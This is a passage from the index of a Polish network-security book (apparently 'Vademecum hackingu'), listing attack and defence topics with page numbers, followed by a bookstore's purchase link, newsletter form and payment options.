się przed rootkitami, 368

się przed skanowaniem portów, 102

się przed szperaczami, 358

się przed trojanami, 355

systemów NT, 193

systemu DNS, 70, 330

systemu NFS, 325

systemu Windows, 201

systemu X, 327

urządzeń z Androidem, 678, 723

usług FTP, 316

usług RPC, 319

usług SSH, 332

w każdej warstwie, 762

wbudowanych obiektów składowanych, 662

zdalnego dostępu, 534

zainfekowane hosty, 423

zaplanowane zadania, 402

zapobieganie atakom XSS, 637

zapora, 194

CheckPoint, 45

Cisco PIX, 52

Windows, 207, 262, 769

zapytania

do rejestru, 401

do serwera WHOIS, 58

zarządzanie

bezpieczeństwem, 266

botnetami, 383

przesyłaniem informacji, 135

zasady

grup, 208, 264, 281

ograniczania dostępu do sieci, 276

tworzenia haseł, 241, 768

zabezpieczeń, 264

zasoby

chronione, 270

dotyczące bezpieczeństwa, 371

zaszyfrowane skróty, 244

zatruwanie DNS, cache poisoning, 328

zdalna kontrola, 247, 249

zdalne

odgadywanie hasła, 203

wykonywanie kodu, 288, 616

wywoływanie powłoki, 699

zdalny

dostęp, 191

pulpit, 251, 490

zdobywanie skrótów haseł, 232

zimne przeładowywanie, 269

zła konfiguracja systemu, 348

zmiana

adresu IP, 700

kontekstu wątku, 261

portu TS, 210

zmienna środowiskowa GEM_PATH, 447

znaczniki

czasu, 370

VLAN, 524

znajdowanie

podatnych na atak aplikacji, 619

sieci bezprzewodowych

odkrywanie aktywne, 546

odkrywanie pasywne, 547

zysk energetyczny anteny, 544

 

żądania

ARP, 556

rekordu version.bind, 134

żądanie

GET, 613

HEAD, 139

INVITE, 518, 532

OPTIONS, 516, 518

Probe Request, 538

REGISTER, 515, 518

skojarzenia, 539

uwierzytelnienia, 538

Voice VLAN Query, 522

 

824 Vademecum hackingu. Skuteczna obrona sieci przed atakami

 

Cała książka jest do kupienia na

http://fraktalla.com/ksiazka/McClure-Stuart-ScambrayJoel-Kurtz-George/Vademecum-hackingu-7,62741001427KS

 

 

 

 

Newsletter

Newsletter
Zapisz Wypisz

Klikając "Zapisz" zgadzasz się na przesyłanie na udostępniony adres e-mail informacji handlowych, tj. zwłaszcza o ofertach, promocjach w formie dedykowanego newslettera.

Płatności

Kanały płatności

Księgarnia Internetowa Fraktalla akceptuje płatności:

  • płatność elektroniczna eCard (karta płatnicza, ePrzelew)
  • za pobraniem - przy odbiorze przesyłki należność pobiera listonosz lub kurier